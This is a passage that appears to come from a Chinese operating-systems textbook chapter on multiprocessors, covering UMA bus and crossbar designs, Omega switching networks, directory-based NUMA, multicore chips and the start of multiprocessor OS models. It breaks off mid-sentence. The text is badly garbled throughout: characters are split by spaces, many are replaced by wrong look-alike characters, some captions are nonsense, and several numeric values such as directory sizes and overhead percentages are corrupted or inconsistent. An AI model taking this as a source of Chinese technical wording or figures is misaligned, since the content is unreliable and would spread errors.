本 章 有 四 个 主要 部 分 ， 分 别 对 应 于 图 8-1 中 的 三 个 模型 再 加 上 虚拟 
化 技术 《一 种 通过 软件 创造 出 更 多 虚拟 CPU 的 方法 ) 。 在 每 一 部 分 中 ， 
我 们 先 简要 地 介绍 相关 的 硬件 。 然 后 ， 讨 论 软件 ， 特 别 是 与 这 种 系统 类 





型 有 关 的 操作 系统 问题 。 我 们 会 及 现 ， 每 种 情况 都 面临 着 不 同 的 问题 并 
且 需 要 不 同 的 解决 方法 。 


8.1 多 处 理 机 


共有 至 存储 器 多 处 理 机 (或 以 后 简称 为 多 处 理 机 ，multiprocessor) 是 
这 样 一 种 计算 机 系统 ， 其 两 个 或 更 多 的 CPU 全 部 共 至 访问 一 个 公用 的 
RAM。 运 行 在 任何 一 个 CPU 上 的 程序 都 看 到 一 个 普通 (通常 是 分 页 ) 
的 虚拟 地 址 空间 。 这 个 系统 惟一 特别 的 性 质 是 ，CPU 可 对 存储 器 字 写 入 
某 个 值 ， 然 后 读 回 该 字 ， 并 得 到 一 个 不 同 的 值 〈 因 为 另 一 个 CPU 改写 了 
它 ) 。 在 进行 恰当 组 织 时 ， 这 种 性 质 构成 了 处 理 露 间 通 信 的 基础 : 一 个 
CPU 加 存储 器 写 入 东 些 数据 而 另 一 个 读 取 这 些 数据 。 





至 村 最 重要 的 部 分 ， 多 处 理 机 操作 系统 只 是 通 币 的 操作 系统 。 它 们 
处 理 系统 调用 ， 进 行 存储 器 管理 ， 提 供 文 件 系 统 并 管理 MO 设备 。 不 
过 ， 在 茶 些 领域 里 它们 还 是 有 一 些 独 特 的 性 质 。 这 包括 进程 同步 、 资 源 
管理 以 及 调度 。 下 面 首先 概要 地 介绍 多 处 理 机 的 硬件 ， 然 后 进入 有 关 操 
作 系 统 的 问题 。 





8.1.1 多 处 理 机 硬件 


所 有 的 多 处 理 机 都 具有 每 个 CPU 可 访问 全 部 存储 器 的 性 质 ， 而 有 些 
多 处 理 机 仍 有 一 些 其 他 的 特性 ， 即 读 出 每 个 存储 器 字 的 速度 是 一 样 快 
的 。 这 些 机 器 称 为 UMA (Uniform Memory Access， 统 一 存储 器 访问 ) 


多 处 理 机 。 相 反 ，NUMA (Nonuniform Memory Access， 非 一 致 存储 器 
访问 ) 多 处 理 机 就 没有 这 种 特性 。 至 于 为 何 有 这 种 差别 ， 稍 后 会 加 以 说 
明 。 我 们 将 首先 考察 UMA 多 处 理 机 ， 然 后 讨论 NUMA 多 处 理 机 。 


1. 基 于 总 线 的 UMA 多 处 理 机 体系 结构 


最 简单 的 多 处 理 机 是 基于 单 总 线 的 ， 参 见 图 8-2a。 两 个 或 更 多 的 
CPU 以 及 一 个 或 多 个 存储 器 模块 都 使 用 同一 个 总 线 进行 通信 。 当 一 个 
CPU 需要 读 一 个 存储 器 字 (memory word) 时 ， 它 首先 检查 总 线 忙 否 
如 果 总 线 空 亲 ， 该 CPU 把 所 需 字 的 地 址 放 到 总 线 上 ， 发 出 大 干 控制 信 
号 ， 然 后 等 竺 存储 器 把 所 需 的 字 放 到 总 线 上 。 


当 某 个 CPU 需 要 读 写 存 储 器 时 ， 如 果 总 线 忙 ，CPU 只 是 等 待 ， 直 到 
总 线 空 亲 。 这 种 设计 存在 问题 。 在 只 有 两 三 个 CPU 时 ， 对 总 线 的 争夺 还 
可 以 管理 ， 若 有 32 个 或 64 个 CPU 时 ， 就 不 可 忍受 了 。 这 种 系统 完全 受到 
总 线 带 宽 的 限制 ， 多 数 CPU 在 大 部 分 时 间 里 是 空闲 的 。 








这 一 问题 的 解决 方案 是 为 每 个 CPU 添加 一 个 高 速 缓存 〈cache) ， 
如 图 8-2b 所 示 。 这 个 高 速 缓存 可 以 位 于 CPU 忌 片 的 内 部 、CPU 附 近 、 在 
处 理 器 板 上 或 所 有 这 三 种 方式 的 组 合 。 由 于 许多 读 操作 可 以 从 本 地 高 速 
缓存 上 得 到 满足 ， 总 线 流量 就 大 大 减少 了 ， 这 样 系统 就 能 够 支持 更 多 的 
CPU. 一般 而 言 ， 高 速 缓存 不 以 单个 字 为 基础 ， 而 是 以 32 字 节 或 64 字 节 
块 为 基础 。 当 引用 一 个 字 时 ， 它 所 在 的 整个 数据 块 〈 叫 做 一 个 cache 














行 ) 被 取 到 使 用 它 的 CPU 的 高 速 缓存 当中 。 
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图 8-2 三 类 基于 总 线 的 多 处 理 机 : 人 没有 高 速 缓存 ; b) 有 高 速 缓存 ; 
c 有 高 速 缓存 与 私有 存储 器 








每 一 个 高 速 缓存 块 或 者 被 标记 为 只 读 《〈 在 这 种 情况 下 ， 它 可 以 同时 
存在 于 多 个 高 速 缓存 中 ) ， 或 者 标记 为 读 写 〈 在 这 种 情况 下 ， 它 不 能 在 
其 他 高 速 缓存 中 存在 ) 。 如 果 CPU 试 图 在 一 个 或 多 个 远程 高 速 缓存 中 写 
入 一 个 字 ， 总 线 硬件 检测 到 写 ， 并 把 一 个 信号 放 到 总 线 上 通知 所 有 其 他 
的 高 速 缓存 。 如 有 果 其 他 高 速 缓存 有 个 “干净 ”的 副本 ， 也 就 是 同 存储 右 内 
容 完全 一 样 的 副本 ， 那 么 它们 可 以 丢弃 该 副本 并 让 写 者 在 修改 之 前 从 存 
储 恬 取出 高 速 缓存 块 。 如 果 茶 些 其 他 高 速 缓存 有 "“ 脏 ”( 被 修改 过 ) 副 
本 ， 它 必须 在 处 理 写 之 前 把 数据 写 回 存储 器 或 者 把 它 通 过 总 线 直 接 传送 
到 写 者 上 。 高 速 缓存 这 一 套 规 则 被 称 为 高 速 缓存 一 致 性 协议 ， 它 是 诸多 
协议 之 一 。 






































还 有 另 一 种 可 能 性 就 是 图 8-2c 中 的 设计 ， 在 这 种 设计 中 每 个 CPU 不 
止 有 一 个 高 速 缓存 ， 还 有 一 个 本 地 的 私有 存储 器 ， 它 通过 一 条 专门 的 





AMA) 总 线 访问 。 为 了 优化 使 用 这 一 配置 ， 编 译 恬 应 该 把 所 有 程序 的 
代码 、 字 符 串 、 种 和 量 以 及 其 他 只 读数 据 、 栈 和 局 部 变量 放 进 私有 存储 器 
中 。 而 共享 存储 器 只 用 于 可 与 的 共享 变量 。 在 多 数 情况 下 ， 这 种 仔细 的 
放置 会 极 大 地 减少 总 线 流量 ， 但 是 这 样 做 需要 编译 器 的 积极 配合 。 





2. 使 用 交叉 开关 的 UMA 多 处 理 机 





即使 有 最 好 的 高 速 缓存 ， 单 个 总 线 的 使 用 还 是 把 UMA 多 处 理 机 的 
数量 限制 在 16 至 32 个 CPU。 要 超过 这 个 数量 ， 需 要 不 同类 型 的 互连网 
络 。 连 接 n 个 CPU 到 k 个 存储 器 的 最 简单 的 电路 是 交叉 开关 ， 人 参见 图 8- 
3。 交 叉 开 关 在 电话 交换 系统 中 已 经 采用 了 几 十 年 ， 用 于 把 一 组 进 线 以 
任意 方式 连接 到 一 组 出 线 上 。 
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图 83 a8X8 交 叉 开 关 ; b) 打 开 的 交叉 点 ; 9 闭合 的 交叉 点 


KFR OER) MEAR CHR) 的 每 个 相交 位 置 上 是 一 个 交叉 点 
(crosspoint) 。 交 又 点 是 一 个 以 电子 方式 开关 的 小 开关 ， 具 体 取决 于 水 
平 线 和 垂直 线 是 否 需 要 连接 。 在 图 8-3a 中 我 们 看 到 有 三 个 交叉 点 同时 闭 
A YF (CPU， 存 储 器 ) 对 (010, 000) 、 (101, 101) 和 (110, 
010) 同时 连接 。 其 他 的 连接 也 是 可 能 的 。 事 实 上 ， 组 合 的 数量 等 于 象 
棋盘 上 8 个 棋子 安全 放置 方式 的 数量 (8 皇后 问题 〉。 





交叉 开关 最 好 的 一 个 特性 是 它 是 一 个 非 阻 塞 网 络 ， 即 不 会 因 有 些 区 
又 点 或 连 线 已 经 极 丘 据 了 而 拒绝 连接 〈 假 设 存 储 融 模块 自身 是 可 用 








的 ) 。 而 且 并 不 需要 预先 的 规划 。 即 使 已 经 设置 了 7 个 任意 的 连接 ， 还 
有 可 能 把 剩余 的 CPU 连接 到 剩余 的 存储 器 上 。 





当然 ， 当 两 个 CPU 同时 试图 访问 同一 个 模块 的 时 候 ， 对 内 存 的 争夺 
还 是 可 能 的 。 不 过 ， 通 过 将 内 存 分 为 n 个 单元 ， 与 图 8-2 的 模型 相 比 ， 这 
样 的 争夺 概率 可 以 降 至 1/n。 


交叉 开关 最 差 的 一 个 特性 是 ， 交 叉 点 的 数量 以 呈 方式 增长 。 若 有 
1000 个 CPU 和 1000 个 存储 器 我 们 就 需要 一 百 万 个 交叉 点 。 这 样 大 数量 的 
交叉 开关 是 不 可 行 的 。 不 过 ， 无 论 如 何 对 于 中 等 规模 的 系统 而 言 ， 交 又 
开关 的 设计 是 可 用 的 。 





3. 使 用 多 级 交换 的 UMA 多 处 理 机 


有 一 种 完全 不 同 的 、 基 于 简单 2x2 开 关 的 多 处 理 机 设计 ， 参 见 图 8- 
4a。 这 个 开关 有 两 个 输入 和 两 个 输出 。 到 达 任 意 一 个 输入 线 的 消息 可 以 
被 交换 至 任意 一 个 输出 线 上 。 就 我 们 的 目标 而 言 ， 消 息 可 由 四 个 部 分 组 
成 ， 参 见 图 8-4b。Module( 模 块 ) 域 指明 使 用 哪个 存储 器 。 

Address (地 址 〉 域 指定 在 模块 中 的 地 址 。Opcode( 操 作 码 ) 给 定 了 操 
作 ， 如 READ 或 WRITE。 最 后 ， 在 可 选 的 Value《 值 ) 域 中 可 包含 一 个 
操作 数 ， 比 如 一 个 要 被 WRITE 写 入 的 32 位 字 。 该 开关 检查 Module 域 并 


利用 它 确 定 消 明 是 应 该 送 给 X 还 是 发 送 给 Y。 





a) b) 


图 8-4 9 一 个 带 有 A 和 B 两 个 输入 线 以 及 XX 和 Y 两 个 输出 线 的 2X2 的 开 
关 ; 消息 格式 


这 个 2x2 开 关 可 有 多 种 使 用 方式 ， 用 以 构建 大 型 的 多 级 交换 网 络 
(Adams 等 人 ，1987; Bhuyan 等 人 ，1989; Kuman 和 Reddy，1987) 。 
有 一 种 是 简单 经 济 的 Omega 网 络 ， 见 图 8-5。 这 里 采用 了 12 个 开关 ， 把 8 
个 CPU 连接 到 8 个 存储 器 上 。 推 而 广 之 ， 对 于 n 个 CPU 和 n 个 存储 器 ， 我 
们 将 需要 log, n 级 ， 每 级 n/2 个 开关 ， 总 数 为 (n/2)log, n 个 开关 ， 比 nz 个 交 
叉 点 要 好 得 多 ， 特 别 是 当 n 值 很 大 时 。 





Omega 网 络 的 接线 模式 常 被 称 作 全 混 洗 (perfect shuffle) ， 因 为 每 
一 级 信号 的 混合 就 像 把 一 副 牌 分 成 两 半 ， 然 后 再 把 牌 一 张 张 混合 起 来 。 
接着 看 看 Omega 网 络 是 如 何 工 作 的 ， 假 设 CPU 011 打 算 从 存储 器 模块 110 
读 取 一 个 字 。CPU 发 送 READ 消 息 给 开关 1D， 它 在 Module 域 包含 110。 
1D 开 关 取 110 的 首位 《最 左 位 ) 并 用 它 进行 路 由 处 理 。0 路 由 到 上 端 输 
出 ， 而 1 的 路 由 到 下 端 ， 由 于 该 位 为 1， 所 以 消息 通过 低 问 输出 被 路 由 到 
2D. 








所 有 的 第 二 级 开关 ， 包 括 2D， 取 用 第 二 个 比特 位 进行 路 由 。 这 一 


位 还 是 1， 所 以 消 恩 通过 低 端 输出 转 友 到 3D。 在 这 里 对 第 三 位 进行 测 
试 ， 结 果 发 现 是 90。 于 是 ， 消 息 送 往 上 端 输出 ， 并 达到 所 期 望 的 存储 器 
110。 该 消息 的 路 径 在 图 8-5 中 由 字母 a 标 出 。 
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图 85 Omega 交换 网 络 
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在 消息 通过 交换 网 络 之 后 ， 模 块 号 的 左 端的 位 就 不 再 需要 了 。 它 们 
可 以 有 很 好 的 用 途 ， 可 以 用 来 记录 入 线 编号 ， 这 样 ， 应 答 消 息 可 以 找到 
返回 路 径 。 对 于 路 径 a， 入 线 编号 分 别 是 0〈 癌 上 输入 到 1D) 、1《〈 低 输 
入 到 2D) 和 1《〈 低 输入 到 3D) 。 使 用 011 作 为 应 答 路 由 ， 只 要 从 右 癌 左 
读 出 每 位 即 可 。 


在 上 述 这 一 切 进行 的 同时 ，CPU 001 需 要 往 存 储 器 001 里 写 入 一 个 
字 。 这 里 发 生 的 情况 与 上 面 的 类 似 ， 消 息 分 别 通过 上 、 上 、 下 端 输出 路 


由 ， 由 字母 b 标 出 。 当 消息 到 达 时 ， 从 Module 域 读 出 001， 人 代表 了 对 应 的 
路 径 。 由 于 这 两 个 请 求 不 使 用 任何 相同 的 开关 、 连 线 或 存储 器 模块 ， 所 
以 它们 可 以 并 行 工作 。 


现在 考虑 如 果 CPU 000 同 时 也 请 求 访问 存储 器 模块 000 会 发 生 什么 情 
况 。 这 个 请 求 会 与 CPU 001 的 请 求 在 开关 3A 处 发 生 冲 突 。 它 们 中 的 一 个 
就 必须 等 待 。 和 交叉 开关 不 同 ，Omega 网 络 是 一 种 阻塞 网 络 ， 并 不 是 每 
组 请 求 都 可 被 同时 处 理 。 冲 突 可 在 一 条 连 线 或 一 个 开关 中 发 生 ， 也 可 在 
对 存储 器 的 请 求 和 来 自 存 储 器 的 应 答 中 产生 。 


显然 ， 很 有 必要 在 多 个 模块 间 均 匀 地 分 散 对 存储 器 的 引用 。 一 种 党 
用 的 技术 是 把 低位 作为 模块 号 。 例 如 ， 考 虑 一 台 经 常 访问 32 位 字 的 计算 
机 中 面向 池 贡 的 地 址 空间 ， 低 位 通常 是 00， 但 接 下 来 的 3 位 会 均匀 地 分 
布 。 将 这 3 位 作为 模块 写 ， 连 续 的 字 会 放 在 连续 的 模块 中 。 而 连续 字 被 
放 在 不 同 模块 里 的 存储 器 系统 被 称 作 交 叉 〈interleaved) 存储 器 系统 。 
交叉 存储 露 将 并 行 运行 的 效率 最 大 化 了 ， 这 是 因为 多 数 对 存储 器 的 引用 
古 连 续 编 址 的 。 设 计 非 阻 窗 的 交换 网 络 也 是 有 可 能 的 ， 在 这 种 网 络 中 ， 
供 了 多 条 从 每 个 CPU 到 每 个 存储 器 的 路 径 ， 从 而 可 以 更 好 地 分 散 流 
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4.NUMA 多 处 理 机 


单 总 线 UMA 多 处 理 机 通常 不 超过 几 十 个 CPU， 而 交叉 开关 或 交换 


网 络 多 处 理 机 需要 许多 〈 昂 贯 ) 的 硬件 ， 所 以 规模 也 不 是 那么 大 。 要 想 
超过 100 个 CPU 还 必须 做 些 让 步 。 通 常 ， 一 种 让 步 就 是 所 有 的 存储 右 模 

块 都 具有 相同 的 访问 时 间 。 这 种 让 步 导 致 了 前 面 所 说 的 NUMA 多 处 理 机 
的 出 现 。 像 UMA 一 样 ， 这 种 机 器 为 所 有 的 CPU 提 供 了 一 个 统一 的 地 址 

空间 ， 但 与 UMA 机 器 不 同 的 是 ， 访 问 本 地 存储 器 模块 快 于 访问 远程 存 

储 器 模块 。 因 此 ， 在 NUMA 机 器 上 运行 的 所 有 UMA 程 序 无 须 做 任何 改 

变 ， 但 在 相同 的 时 钟 速率 下 其 性 能 不 如 UMA 机 器 上 的 性 能 。 











所 有 NUMA 机 器 都 具有 以 下 三 种 关键 特性 ， 它 们 使 得 NUMA 机 右 与 
其 他 多 处 理 机 相 区 别 : 


1) 具 有 对 所 有 CPU 都 可 见 的 单个 地 址 空间 。 


2) 通 过 LOAD 和 STORE 指令 访问 远程 存储 器 。 








3) 访 问 远程 存储 器 慢 于 访问 本 地 存储 右 。 


在 对 远程 存储 器 的 访问 时 间 不 被 隐藏 时 〈 因 为 没有 高 速 缓存 ) AR 
统 被 称 为 NC-NUMA (No Cache NUMA， 无 高 速 缓存 NUMA ) 。 在 有 一 
致 性 高 速 缓存 时 ， 系 统 被 称 为 CC-NUMA (Cache-Coherent NUMA， 高 


速 缓存 一 致 NUMA -à 





目前 构造 大 型 CC-NUMA 多 处 理 机 最 常见 的 方法 是 基于 目录 的 多 处 
理 机 (directory-based multiprocessor) 。 其 基本 思想 是 ， 维 护 一 个 数据 








库 来 记录 高 速 缓存 行 的 位 置 及 其 状态 。 当 一 个 高 速 缓存 行 被 引用 时 ， 就 
碍 询 数据 库 找 出 高 速 缓存 行 的 位 置 以 及 它 是 “干净 ?的 还 是 “ 脏 ”《〈 被 修改 
过 ) 的 。 由 于 每 条 访问 存储 器 的 指令 都 必须 查询 这 个 数据 库 ， 所 以 它 必 
须 配 有 极 高 速 的 专用 硬件 ， 从 而 可 以 在 一 个 总 线 周期 的 几 分 之 一 内 作出 
啊 应 。 





要 使 基于 目录 的 多 处 理 机 的 想法 更 具体 ， 让 我 们 考虑 一 个 简单 的 








分 成 2% 个 64 字 节 大 小 的 高 速 缓存 行 。 存 储 器 被 静态 地 在 节点 间 分 配 ， 
节点 0 是 0 一 16M， 节 点 1 是 16 一 32M， 以 此 类 推 。 节 点 通过 互连网 络 连 
接 ， 参 见 图 8-6a。 每 个 节点 还 有 用 于 构成 其 2%4 字 节 存储 器 的 21 个 64 字 
节 高 速 缓存 行 的 目录 项 。 上 此刻， 我 们 假定 一 行 最 多 被 一 个 高 速 缓存 使 
用 。 











为 了 了 解 目 录 是 如 何 工 作 的 ， 让 我 们 跟踪 引用 了 一 个 高 速 缓存 行 的 
发 目 CPU 20 的 LOAD 指 令 。 首 先 ， 发 出 该 指令 的 CPU 把 它 交 给 目 己 的 
MMU， 被 翻译 成 物理 地 址 ， 比 如 说 ，0x24000108。MMU 将 这 个 地 址 拆 
分 为 三 个 部 分 ， 如 图 8-6b 所 示 。 这 三 个 部 分 按 十 进 制 是 节点 36、 第 4 行 
和 偏 移 量 8。MMU 看 到 引用 的 存储 器 字 来 自 节 点 36， 而 不 是 节点 20， 所 
以 它 把 请 求 消息 通过 互连网 络 发 送 到 该 高 速 缓存 行 的 的 主 节点 Chome 
node) 36 上 ， 询 问 行 4 是否 被 高 速 缓存 ， 如 果 是 ， 高 速 缓存 在 何 处 。 
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图 8-6 2a)256 个 节点 的 基于 目录 的 多 处 理 机 ; b)32 位 存储 器 地 址 划分 的 
域 ; 节点 36 中 的 目录 


当 请 求 通过 互连网 络 到 达 节 点 36 时 ， 它 被 路 由 至 目录 硬件。 硬件 检 
索 其 包含 2 个 表 项 的 目录 表 (其 中 的 每 个 表 项 代表 一 个 高 速 缓存 行 ) 
并 解析 到 项 4。 从 图 8-6c 中 ， 我 们 可 以 看 到 该 行 没 有 被 高 速 绥 存 ， 所 以 
硬件 从 本 地 RAM 中 取出 第 4 行 ， 送 回 给 节点 20， 更 新 目录 项 4， 指 出 该 
行 目前 被 高 速 缓存 在 节点 20 处 。 














现在 来 考虑 第 二 个 请 求 ， 这 次 访问 节点 36 的 第 2 行 。 在 图 8-6c 中 ， 
我 们 可 以 看 到 这 一 行 在 节点 82 处 被 高 速 缓存 。 此 刻 人 硬件 可 以 更 新 目录 项 





2， 指 出 该 行 现 在 在 贡 点 20 上 ， 然 后 送 一 条 消 轧 给 节点 82， 指 示 把 该 行 
传 给 市 反 20 并 且 使 其 自 喘 的 高 速 缓 存 无 效 。 注 意 ， 即 使 一 个 所 谓 “ 共 至 
存储 器 多 处 理 机 ?， 在 下 层 仍然 有 大 量 的 消 妃 传递 。 











让 我 们 顺便 计算 一 下 有 多 少 存储 器 单元 被 目录 占用 。 每 个 节点 有 16 
MB 的 RAM， 并 且 有 23 个 9 位 的 目录 项 记录 该 RAM。 这 样 目 录 上 的 开 文 
大 约 是 9x218 位 除 以 16 MB， 即 约 1.76%， 一 般 而 言 这 是 可 接受 的 〈 尽 管 
这 些 都 是 高 速 存储 器 ， 会 增加 成 本 ) 。 即 使 对 于 32 字 节 的 高 速 缓存 行 ， 
开销 也 只 有 49%。 至 于 128 字 节 的 高 速 缓存 行 ， 它 的 开销 不 到 1%。 











该 设计 有 一 个 明显 的 限制 ， 即 一 行 只 能 被 一 个 节点 高 速 缓存 。 要 想 
允许 一 行 能 够 在 多 个 节点 上 被 高 速 缓存 ， 我 们 需要 某 种 对 所 有 行 定位 的 
方法 ， 例 如 ， 在 写 操作 时 使 其 无 效 或 更 新 。 要 允许 同时 在 寿 干 让 把 上 进 
行 高 速 缓存 ， 有 几 种 选择 方案 ， 不 过 对 它们 的 讨论 已 超出 了 本 书 的 范 
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5. 多 核心 片 





随 着 已 片 制造 技术 的 发 展 ， 蝇 体 管 的 体积 越 来 越 小 ， 从 而 有 可 能 将 
越 来 越 多 的 晶体 管 放 入 一 个 芯片 中 。 这 个 基于 经 验 的 发 现 通常 称 为 摩尔 
EIE (Moore's Law) ， 得 名 于 首次 发 现 该 规律 的 Intel 公 司 创 始 人 之 一 
Gordon Moore. Intel Core 2 Duo 系 列 蕊 片 已 包含 了 3 亿 数 量 级 的 晶体 
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随 之 一 个 显而易见 的 问题 是 :“ 你 怎么 利用 这 些 唱 体 管 ? ”按照 我 们 
在 第 1.3.1 小 市 的 讨论 ， 一 个 选择 是 给 心 片 添加 数 兆 字 市 的 高 速 缓存 。 这 
个 选择 是 认真 的 ， 和 之 有 4 兆 字 节 片 上 高 速 绥 存 的 心 片 现在 已 经 很 常见 ， 
并 且 融 有 更 多 片上 高 速 缓存 的 芯片 也 即将 出 现 。 但 是 到 了 某 种 程度 ， 再 
增加 局 速 绥 存 的 大 小 只 能 将 命中 率 从 99% 提 高 到 99.5%， 而 这 样 的 改进 
并 不 能 显著 提升 应 用 的 性 能 。 

















另 一 个 选择 是 将 两 个 或 者 多 个 完整 的 CPU， 通 常 称 为 核 (core) ， 
放 到 同一 个 必 片 上 《技术 上 来 说 是 同一 个 小 硅 片 ) 。 双 核 和 四 核 的 芯片 
已 经 普及 ， 八 十 核 的 已 片 已 经 被 制造 出 来 ， 而 禹 有 上 百 个 核 的 已 片 也 即 
将 出 现 。 


里 然 CPU 可 能 共 圣 高 速 绥 存 或 者 不 共 译 《如 图 1-8 所 示 )〉， 但 是 它 
们 都 共享 内 存 。 考 虑 到 每 个 内 存 字 总 是 有 惟一 的 值 ， 这 些 内 存 是 一 致 
的 。 特 殊 的 硬件 电路 可 以 确保 在 一 个 字 同 时 出 现在 两 个 或 者 多 个 的 高 速 
缓存 中 的 情况 下 ， 当 其 中 茶 个 CPU 修改 了 该 字 ， 所 有 其 他 高 速 缓存 中 的 
该 字 者 会 伞 目 动 地 并 且 原 子 性 地 删除 来 确保 一 致 性 。 这 个 过 程 称 为 颖 探 


(snooping) 。 


这 样 设计 的 结果 是 多 核 蕊 片 就 相当 于 小 的 多 处 理 机 。 实 际 上 ， 多 核 
芯片 时 常 被 称 为 片 级 多 处 理 机 〈Chip-level MultiProcessors, CMP) 。 从 
软件 的 角度 来 看 ，CMP 与 基于 总 线 的 多 处 理 机 和 使 用 交换 网 络 的 多 处 理 
机 并 没有 太 大 的 差别 。 不 过 ， 它 们 还 是 存在 着 若干 的 差别 。 例 如 ， 对 基 








于 总 线 的 多 处 理 机 ， 每 个 CPU 拥有 目 己 的 高 速 缓存 ， 如 图 8-2b 以 及 图 1- 
8b 的 AMD 设 计 所 示 。 在 图 1-8a 所 示 的 Intel 使 用 的 共 孕 高速 缓存 的 设计 并 
没有 出 现在 其 他 的 多 处 理 机 中 。 共 享 二 级 高 速 缓存 会 影响 性 能 。 如 果 一 
个 核 需要 很 多 高 速 缓存 空间 ， 而 另 一 个 核 不 需要 ， 这 样 的 设计 允许 它们 
各 自 使 用 所 需 的 高 速 缓存 。 但 另 一 方面 ， 共 享 高 速 缓存 也 让 一 个 贪 禁 的 
核 损 害 其 他 核 的 性 能 成 为 了 可 能 。 

















CMP 与 其 他 更 大 的 多 处 理 机 之 间 的 男 一 个 差异 是 容错 。 因 为 CPU 之 
间 的 连接 非常 紧密 ， 一 个 共 至 模块 的 失效 可 能 导致 许多 CPU 同 时 出 错 。 
而 这 样 的 情况 在 传统 的 多 处 理 机 中 是 很 少 出 现 的 。 


除了 所 有 核 都 是 对 等 的 对 称 多 核 芯 片 之 外 ， 还 有 一 类 多 核 攻 片 被 称 
Ak LA (system on a chip) 。 这 些 心 片 含有 一 个 或 者 多 个 主 CPU， 
但 是 同时 还 包含 徊 干 个 专用 核 ， 例 如 视频 与 音频 解码 器 、 加 密 必 片 、 网 
络 接口 等 。 这 些 核 共同 构成 了 完整 的 片上 计算 机 系统 。 


正如 过 去 已 经 发 生 的 ， 硬 件 的 及 展 闻 季 领先 于 软件 。 多 核 的 时 代 已 
经 来 临 ， 但 是 我 们 还 不 具备 为 它们 编写 应 用 程序 的 能 力 。 现 有 的 编程 语 
言 并 不 适合 编写 高 度 并 行 的 代码 ， 同 时 适用 的 编译 器 和 调试 工具 还 很 项 
乏 。 几 乎 没有 几 个 程序 员 有 编写 并 行程 序 的 经 验 ， 而 大 部 分 程序 员 对 于 
如 何 将 工作 划分 为 看 干 可 以 并 行 执 行 的 块 〈package) 知之 其 少 。 同 
步 、 消 除 竞 争 、 避 免 死 锁 成 为 了 程序 员 的 置 梦 ， 同 时 也 影响 到 了 性 能 。 


Agi (semaphore) 并 不 能 解决 问题 。 除 了 这 些 问 题 ， 什 么 样 的 应 用 
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真 的 需要 使 用 数 百 个 核 尚 不 明确 。 目 然 语言 语音 识别 可 能 需要 大 量 的 计 
算 能 力 ， 但 这 里 的 问题 并 不 是 缺少 时 钟 周期 ， 而 是 缺少 可 行 的 算法 。 简 
而 言 之 ， 或 许 人 硬件 开发 人 员 正 在 发 布 软件 开发 人 员 不 知道 如 何 使 用 而 用 
户 也 并 不 需要 的 产品 。 





8.1.2 ”多 处 理 机 操作 系统 类 型 


让 我 们 从 对 多 处 理 机 硬件 的 讨论 转 到 多 处 理 机 软件 ， 特 别 是 多 处 理 
机 操作 系统 上 来 。 这 里 有 各 种 可 能 的 方法 。 接 下 来 将 讨论 其 中 的 三 种 。 
需要 强调 的 是 所 有 这 些 方法 除了 适用 于 多 核 系统 之 外 ， 同 样 适 用 于 包含 
多 个 分 离 CPU 的 系统 。 


1. 每 个 CPU 有 自己 的 操作 系统 


组 织 一 个 多 处 理 机 操作 系统 的 可 能 的 最 简单 的 方法 是 ， 裔 态 地 把 存 
储 需 划分 成 和 CPU 一 样 多 的 各 个 部 分 ， 为 每 个 CPU 提供 其 私有 存储 融 以 
及 操作 系统 的 各 自私 有 副本 。 实 际 上 n 个 CPU 以 n 个 独立 计算 机 的 形式 运 
行 。 这 样 做 一 个 明显 的 优点 是 ， 允 许 所 有 的 CPU 共 享 操作 系统 的 代码 ， 
而 且 只 需要 提供 数据 的 私有 副本 ， 如 图 8-7 所 示 。 


CPU 1 CPU 2 CPU 3 CPU 4 存储 器 I/O 
有 OS 的 有 OS 的 
私有 私有 
数据 | 数据 
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N 总 线 


图 8-7 在 4 个 CPU 中 划分 多 处 理 机 存储 器 ， 但 共享 一 个 操作 系统 代码 


的 副本 。 标 有 “数据 ”字样 的 方 框 是 每 个 CPU 的 操作 系统 私有 数据 


这 一 机 制 比 有 n 个 分 离 的 计算 机 村 好， 因为 它 允 许 所 有 的 机 器 共 主 
一 套 磁 盘 及 其 他 的 IO 设备 ， 它 还 允许 灵活 地 共享 存储 器 。 例 如 ， 即 便 
使 用 静态 内 存 分 配 ， 一 个 CPU 也 可 以 获得 极 大 的 一 块 内 存 ， 从 而 高 效 地 
执行 代码 。 另 外 ， 由 于 生产 者 能 够 直接 把 数据 写 入 存储 器 ， 从 而 使 得 消 
费 者 从 生产 者 写 入 的 位 置 取出 数据 ， 因 此 进程 之 间 可 以 局 效 地 通信 。 况 
且 ， 从 操作 系统 的 角度 看 ， 每 个 CPU 都 有 自己 的 操作 系统 非常 自然 。 





值得 提 及 该 设计 看 来 不 明显 的 四 个 方面 。 首 先 ， 在 一 个 进程 进行 系 
统 调用 时 ， 该 系统 调用 是 在 本 机 的 CPU 上 被 捕获 并 处 理 的 ， 并 使 用 操作 
系统 表 中 的 数据 结构 。 


其 次 ， 因 为 每 个 操作 系统 都 有 自己 的 表 ， 那 么 它 也 有 自己 的 进程 集 
合 ， 通 过 自身 调度 这 些 进程 。 这 里 没有 进程 共享 。 如 果 一 个 用 户 登 录 到 
CPU 1， 那 么 他 的 所 有 进程 都 在 CPU 1 上 运行 。 因 此 ， 在 CPU 2 有 负载 运 
行 而 CPU 1 空 载 的 情形 是 会 发 生 的 。 


第 三 ， 没 有 页 面 共享 。 会 出 现 如 下 的 情形 : 在 CPU2 不 断 地 进行 页 
面 调度 时 CPU 1 却 有 多 余 的 页 面 。 由 于 内 存 分 配 是 固定 的 ， 所 以 CPU 2 
无 法 向 CPU 1 借用 页 面 。 





第 四 ， 也 是 最 坏 的 情形 ， 如 果 操 作 系 统 维护 近期 使 用 过 的 磁盘 块 的 
绥 冲 区 高 速 缓存 ， 每 个 操作 系统 都 独 目 进行 这 种 维护 工作 ， 因 此 ， 可 能 
出 现 茶 一 修改 过 的 磁盘 块 同 时 存在 于 多 个 绥 冲 区 高 速 缓存 的 情况 ， 这 将 











会 导致 不 一 致 性 的 结果 。 避 免 这 一 问题 的 惟一 途径 是 ， 取 消 缓冲 区 高 速 
缓存 。 这 样 做 并 不 难 ， 但 是 会 显著 降低 性 能 。 


由 于 这 些 原因 ， 上 述 模 型 已 很 少 使 用 ， 尽 管 在 早期 的 多 处 理 机 中 它 
一 度 被 采用， 那 时 的 目标 是 把 已 有 的 操作 系统 尽 可 能 快 地 移植 到 新 的 多 
处 理 机 上 。 





2. 主 从 多 处 理 机 


图 8-8 中 给 出 的 是 第 二 种 模型 。 在 这 种 模型 中 ， 操 作 系 统 的 一 个 副 
本 及 其 数据 表 都 在 CPU 1 上 ， 而 不 是 在 其 他 所 有 CPU 上 。 为 了 在 该 CPU 
1 上 进行 处 理 ， 所 有 的 系统 调用 都 重 定向 到 CPU 1 上 。 如 果 有 剩余 的 CPU 
